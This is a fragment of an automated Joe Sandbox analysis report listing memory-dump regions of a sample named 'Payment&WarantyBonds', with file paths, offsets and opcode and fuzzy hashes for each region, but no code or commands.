                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                • Instruction ID: d2d65fdfcb6dac36c23666b6a5e546dd9ef5046ba45465703b0310c9e7a67fa2
                                                                                                                                                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A51A531D0021EEFEF21BF98C894BAEBB79AB00764F154665E912F7190D7309F408BA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca6a7e910dca6a27e133687c09e25e304a6391104f19f72c94099075882e49c3
                                                                                                                                                                                • Instruction ID: 87d9bd973b24cc38151c642c7a08758f946846d7451799d1a16128cee71d959a
                                                                                                                                                                                • Opcode Fuzzy Hash: ca6a7e910dca6a27e133687c09e25e304a6391104f19f72c94099075882e49c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8541D5707816119BE729DB2DC894B7BBB9AEF92B20F04822DF955C7281DB34DB01C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e89ffab150bee3d79fad2b9446ff384838808a27745b716ae34b28ba82b9df78
                                                                                                                                                                                • Instruction ID: 15e122f5b8fa6e5c5a5ddfef0dc79d60c59030f3c5ba9c2e15546072a5c63dd0
                                                                                                                                                                                • Opcode Fuzzy Hash: e89ffab150bee3d79fad2b9446ff384838808a27745b716ae34b28ba82b9df78
                                                                                                                                                                                • Instruction Fuzzy Hash: 27515D7690021ADFCB20EFA9C98099EBBB9FF48354B254519D545E7708E734AF01CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                • Instruction ID: 288ed2f4ae149c92f6bcb5813f0e2963c7f752bb0c636ddc9c9a3051d11d3d42
                                                                                                                                                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D41E97260171A9FD729CF1CC980A6AB7A9FF80714B05462EE912C7644FB30EE04C7D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9a646f1fd4a61d202f9329118e43fe79ade0c4f8e72ec18893bb43681874b23c
                                                                                                                                                                                • Instruction ID: c7121d640282225335309f0e21e63dd67d24c3f4492382b8f67300e9add1dc79
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a646f1fd4a61d202f9329118e43fe79ade0c4f8e72ec18893bb43681874b23c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8841BC369002199BDB15DF98C440AEEBBB5BF88714F19826AF819F7340E7349E41CBA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                                                                                • Instruction ID: fe86b6468034a6c5e8c3a97b40280f305d0f75d41528036183ad82566e67bab1
                                                                                                                                                                                • Opcode Fuzzy Hash: d52986ed9f3dfd18dafe18436a9c3e08c8fe213d05f96b8505aa4ee61b645290
                                                                                                                                                                                • Instruction Fuzzy Hash: A541D2722103059FD725EF6CC880A57B7EAFF98328F10492EE657C7215EB34EA848B55
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                • Instruction ID: 8a1a98a87f62742a445cd2de2ee56e47a41b84a13ee01bc2eac159509957aedd
                                                                                                                                                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B514775A00219DFCB19CF98C480AAEF7B6FF84714F2881A9D915E7351D730EA82CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                                                                                • Instruction ID: 64f1849af70932adb9de2951c4f7dbe30a3552b6a2211e1bc930339b97e3cdc1
                                                                                                                                                                                • Opcode Fuzzy Hash: fd5b373e4e6f1b6022305e84c750d7a3cc5ae0f74c99cc54ca76eeb4eae806c5
                                                                                                                                                                                • Instruction Fuzzy Hash: F451077090020BDBDB66CB28CC00BA8BBB5FF11314F2442A9E525D72C5E7345B91CF45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4ae30bd78418ba7af123080e6b15459d4d229fe394423e67675018a9b5bb7728
                                                                                                                                                                                • Instruction ID: c6dc899456f08a9b99d110ac811d138804dbbf32deeeb720855be8283f5b4976
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ae30bd78418ba7af123080e6b15459d4d229fe394423e67675018a9b5bb7728
                                                                                                                                                                                • Instruction Fuzzy Hash: D041A2726087469FD320EF6CC840A6AB7E9FFC8704F144619F994D7680E730EA09C7A6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 02b5d9a0b174f0afe2bdad0e74c626aade8d29459e4d8a288238aaeb3642091e
                                                                                                                                                                                • Instruction ID: a5cc6b22496805f1b9963d6e8dc4fe3ecf712370a9ab593c21aa8e3671eaa058
                                                                                                                                                                                • Opcode Fuzzy Hash: 02b5d9a0b174f0afe2bdad0e74c626aade8d29459e4d8a288238aaeb3642091e
                                                                                                                                                                                • Instruction Fuzzy Hash: A24191716443098FD766DF1CDC84B26BBAAAF80354F14457DE645C72E1D730DA41CB51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 980e8724d0535b4c0233d5c425c541f5bc9bfaf31002a9df6257b48f00374fdd
                                                                                                                                                                                • Instruction ID: dfc959cd6adf0d375165bf472cbeb96cfcd547553d81d876a0774bc2c5079024
                                                                                                                                                                                • Opcode Fuzzy Hash: 980e8724d0535b4c0233d5c425c541f5bc9bfaf31002a9df6257b48f00374fdd
                                                                                                                                                                                • Instruction Fuzzy Hash: F1416D71A01609DFCB15CF69C980A9EF7F2FF98320B1486AED666E7390DB349941CB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                • Instruction ID: f6c25ac77bc0ee426caa4046d7c7c4364db400f6b3f3687b98a6f68b53ce81ec
                                                                                                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                • Instruction Fuzzy Hash: FD311832A04248AFDB228B6CCC40B9FBFEDAF14354F044565F855D739AC6749A84CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eba3d89ee8150931152e5d65ffc13a51ad25a1b1c553cd7c565c175fdb22c3ca
                                                                                                                                                                                • Instruction ID: f2019904e37eafffa0b57b059864731e70758578bbd8acc658aefd020d3bf51d
                                                                                                                                                                                • Opcode Fuzzy Hash: eba3d89ee8150931152e5d65ffc13a51ad25a1b1c553cd7c565c175fdb22c3ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 0731BC35741716ABE7229F598C81FAB76FCAF59B50F400428FA00EB291DAA4DE01C7D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 48512530463702a05da66cffb8e762abeda625857b99c3e2224ed55845aa5257
                                                                                                                                                                                • Instruction ID: 7d929c25758a559527d2c68ea375e2fa0e17ddb0653edbe4c3330e62800ab07d
                                                                                                                                                                                • Opcode Fuzzy Hash: 48512530463702a05da66cffb8e762abeda625857b99c3e2224ed55845aa5257
                                                                                                                                                                                • Instruction Fuzzy Hash: A5318E326052018FC321DF1DD8D1EA6B7E6FB84760F29446DE996CB356EB31AA40CF91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7901c952d4d1f383a7a847ca6851e48691d17c1658b32fe67dd32fee3117d681
                                                                                                                                                                                • Instruction ID: 91b84fe26c94869200a638259e9f3a02ecaed66ec54a4bf14b15f5ee3e9467d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 7901c952d4d1f383a7a847ca6851e48691d17c1658b32fe67dd32fee3117d681
                                                                                                                                                                                • Instruction Fuzzy Hash: 8241BE71200B499FC763CF68C880F96BBE9AF45714F11882DE699CB390C734EA04CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f8f872cbd6ac8b42ac64ab2cfdd144c8031196baa0ebf438432647302c15bbfa
                                                                                                                                                                                • Instruction ID: 4bed1b94a0a76fc47ac860e9767e21e49b010f604e81c7f00ecaa1c5da3fc4d2
                                                                                                                                                                                • Opcode Fuzzy Hash: f8f872cbd6ac8b42ac64ab2cfdd144c8031196baa0ebf438432647302c15bbfa
                                                                                                                                                                                • Instruction Fuzzy Hash: BD317E716042018FD320DF28C8D1EAAB7E5FB84B10F19456DF996DB396E730EA04CB92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4d75d6e5ff732442e4abfa0bff5552354857cc722f65a389a12c83b0d11eeea7
                                                                                                                                                                                • Instruction ID: f866d108f460ad35062c6aa8b339e0bc2c5466c9ab01840ccaf8f6f5cc3aed35
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d75d6e5ff732442e4abfa0bff5552354857cc722f65a389a12c83b0d11eeea7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C31D1323016869BF326976CCE48B257FD9BB51B44F1D00E0AF85EB6D2DB28DA41C231
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b59c5d7356a8e04f7404bc26dfb2c3b943d5f64a6e99340e271aca5cc8011c17
                                                                                                                                                                                • Instruction ID: 686a390b3f6e7387c7f7b9efe84a63a2f462a19d6e272efcfa350570d6bc54d4
                                                                                                                                                                                • Opcode Fuzzy Hash: b59c5d7356a8e04f7404bc26dfb2c3b943d5f64a6e99340e271aca5cc8011c17
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E319276A0015AABDB15DF98C840FAEB7B6EB48B40F554169E900EB344E770EE41CB94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d4a8d71f21a3c4d11d0f36f1f43dd2a7e5e2db7426155d06d737d73f23d555a0
                                                                                                                                                                                • Instruction ID: 68c9cbd8e6677cf3fb59429f8055593c61eeb455b4a99c2d7e9b57eb39e02219
                                                                                                                                                                                • Opcode Fuzzy Hash: d4a8d71f21a3c4d11d0f36f1f43dd2a7e5e2db7426155d06d737d73f23d555a0
                                                                                                                                                                                • Instruction Fuzzy Hash: 28315576A4112DABDF21DF58DC44BDEBBB9AB98310F1800A5A508E7260DB70DF918F91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3cee64466b2c22ee4475540f9a0851e61d13c1f40c88dfb552fa1e076fda3ec7
                                                                                                                                                                                • Instruction ID: bd07f52f406440d20e70e0ad9c851a97053a9fb720fddd8e3edb60565feb21df
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cee64466b2c22ee4475540f9a0851e61d13c1f40c88dfb552fa1e076fda3ec7
                                                                                                                                                                                • Instruction Fuzzy Hash: FF31C772E00229AFDB22DFADCC40AAEBBF9EF58750F114425E915E7250D6709F408BA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: db69dc7b5f8886334202a3260152f6f7a4952192c3d79d5347f9d1c1626b9300
                                                                                                                                                                                • Instruction ID: 2d9ff91305990e09682fd732953c73ba1422bc555c794287b0807bfbe0a60544
                                                                                                                                                                                • Opcode Fuzzy Hash: db69dc7b5f8886334202a3260152f6f7a4952192c3d79d5347f9d1c1626b9300
                                                                                                                                                                                • Instruction Fuzzy Hash: A831D872600A06EFD7129F5DC890B6A77B9AF94B54F20407EE505EB342EA30DF018B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2073290d70633e838a502545364864290bd24d4f2ebcd8dfdf04624e4443e5c3
                                                                                                                                                                                • Instruction ID: 490a841c976fcaf7c6f9a52a38bd33c8faf04576718cb0253aceeecbc42b0845
                                                                                                                                                                                • Opcode Fuzzy Hash: 2073290d70633e838a502545364864290bd24d4f2ebcd8dfdf04624e4443e5c3
                                                                                                                                                                                • Instruction Fuzzy Hash: F231AF72A0461A9BC753DE288C80A6BBBA5BB943A0F014529FD59D7391DA30DF1187E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0a5ee1d302a4c73d76d0b6eb8ab621c5f9989a3f69266b2d2a89765ed8a5f5aa
                                                                                                                                                                                • Instruction ID: 8e14669f1835454d99253958ff7043624aef5de7cb33b5d2df1fad4205b7feaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5ee1d302a4c73d76d0b6eb8ab621c5f9989a3f69266b2d2a89765ed8a5f5aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 09319E71A093018FE761CF19C840B1ABBEAFB88700F0549ADF984D7391D771EA44CB92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                • Instruction ID: 934c382b8d6d1617874aa4d387498140bd62812861a89fa833e44f7a60b7e0c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                                • Instruction Fuzzy Hash: C0312E72B04B01AFE765CF6DDD81B57BBF8AB48B50F18452DA5DAC3650E630EA008B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0dea94fdde52f051d622b0d8a7082fc9c346fc5ac579d70ef876f7742d1a64cb
                                                                                                                                                                                • Instruction ID: 8cc970b11bb21e4b238509105682605149b779d73d51fe78da75d69657683479
                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea94fdde52f051d622b0d8a7082fc9c346fc5ac579d70ef876f7742d1a64cb
                                                                                                                                                                                • Instruction Fuzzy Hash: ED317A715153028FCB11EF19C58095ABBF6FF89318F444AAEE588DB351E331AA44CB92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1b19f70a9fcf7b4bc5e3efad5442966f23773c278ef2ec2e2c65c9d81dec7f70
                                                                                                                                                                                • Instruction ID: a8ebc43b4140b7bf132e704d450ec801c4d5dbde28906e7e6dd2d037059d328c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1b19f70a9fcf7b4bc5e3efad5442966f23773c278ef2ec2e2c65c9d81dec7f70
                                                                                                                                                                                • Instruction Fuzzy Hash: 5531F432B116159FD721DFA8C980E6EBBF9AF80308F108529D106D3255E730DF81CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                • Instruction ID: abd0c50a36f36d2a23c02331af114cddcee7b5b6e7807aab3a593bdfb834d42c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                                • Instruction Fuzzy Hash: 62210136E4025EAADB119BB98851BEFFBB9EF14740F0581799E15EB340E270CA00C7A0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6fe9cb915c7f8ee7770962ef2d691cd4f162b0d427146b4fc07ab423a0504f08
                                                                                                                                                                                • Instruction ID: 74dda1e0507eeebbc97949257edf7e2f19229ceae7fbbb352382ec113011ebea
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fe9cb915c7f8ee7770962ef2d691cd4f162b0d427146b4fc07ab423a0504f08
                                                                                                                                                                                • Instruction Fuzzy Hash: D03129B25002018BDB71AF5CCC40BA977B4EF50314F5482A9DD45DB386EA349B82CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                • Instruction ID: f880e310b61daa20beccb98b555599819289a62644f7c51e01f560236c3d768e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                • Instruction Fuzzy Hash: E6212D3A600A5677CB15AB9988C0AFBBFB4EF40710F40841AFA55C7751E739DB40C3A1
                                                                                                                                                                                Memory Dump Source
